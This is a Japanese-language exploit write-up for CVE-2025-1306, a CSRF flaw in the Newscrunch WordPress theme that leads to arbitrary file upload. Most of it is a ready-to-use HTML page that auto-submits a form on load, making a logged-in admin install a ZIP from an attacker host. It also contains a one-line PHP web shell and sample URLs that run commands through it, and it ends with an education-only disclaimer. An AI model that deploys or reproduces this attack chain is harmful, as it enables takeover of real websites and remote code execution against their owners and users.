
このエクスプロイトは、Newscrunch WordPress テーマ の クロスサイトリクエストフォージェリ (CSRF) から任意ファイルアップロード に至る脆弱性 (CVE-2025-1306) を標的としています。newscrunch_install_and_activate_plugin() 関数に nonce 検証 が欠如しているため、認証されていない攻撃者 は、ログイン済みの管理者をだまして任意のファイルをサーバーにアップロードさせ、リモートコード実行 (RCE) につなげることができます。
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H悪用可能性: 管理者が細工された悪意のあるリンクを訪問する必要があります。
このエクスプロイトは、認証済みの管理者 に対し、Web シェルを含む悪意のある ZIP ファイルをアップロードする CSRF 攻撃 を実行させます。
<!DOCTYPE html>
<html>
<head>
<title>CSRF Exploit CVE-2025-1306 By Nxploit ,Khaled AlEnazi</title>
</head>
<body>
<h2>Click anywhere to load content...</h2>
<script>
function sendExploit() {
var form = document.createElement("form");
form.method = "POST";
form.action = "http://target.com/wp-admin/admin-ajax.php?action=newscrunch_install_activate_plugin";
var input = document.createElement("input");
input.type = "hidden";
input.name = "plugin_url";
input.value = "http://attacker.com/shell.zip";
form.appendChild(input);
document.body.appendChild(form);
form.submit();
}
window.onload = function() {
sendExploit();
};
</script>
</body>
</html>
📌 置き換え:
http://target.com/ を 脆弱な WordPress サイト にhttp://attacker.com/shell.zip を Web シェルを含む 悪意のある ZIP ペイロード に<?php system($_GET['cmd']); ?>
📌 悪用に成功した後、シェルにアクセスします:
http://target.com/wp-content/plugins/shell.php?cmd=whoami
http://target.com/wp-content/plugins/shell.php?cmd=ls
このツールは教育およびセキュリティ研究目的のみで使用してください。 脆弱性の不正な悪用は違法であり、法律で罰せられます。作者は、このツールによって引き起こされた誤用や損害について 責任を負いません。責任を持って使用してください。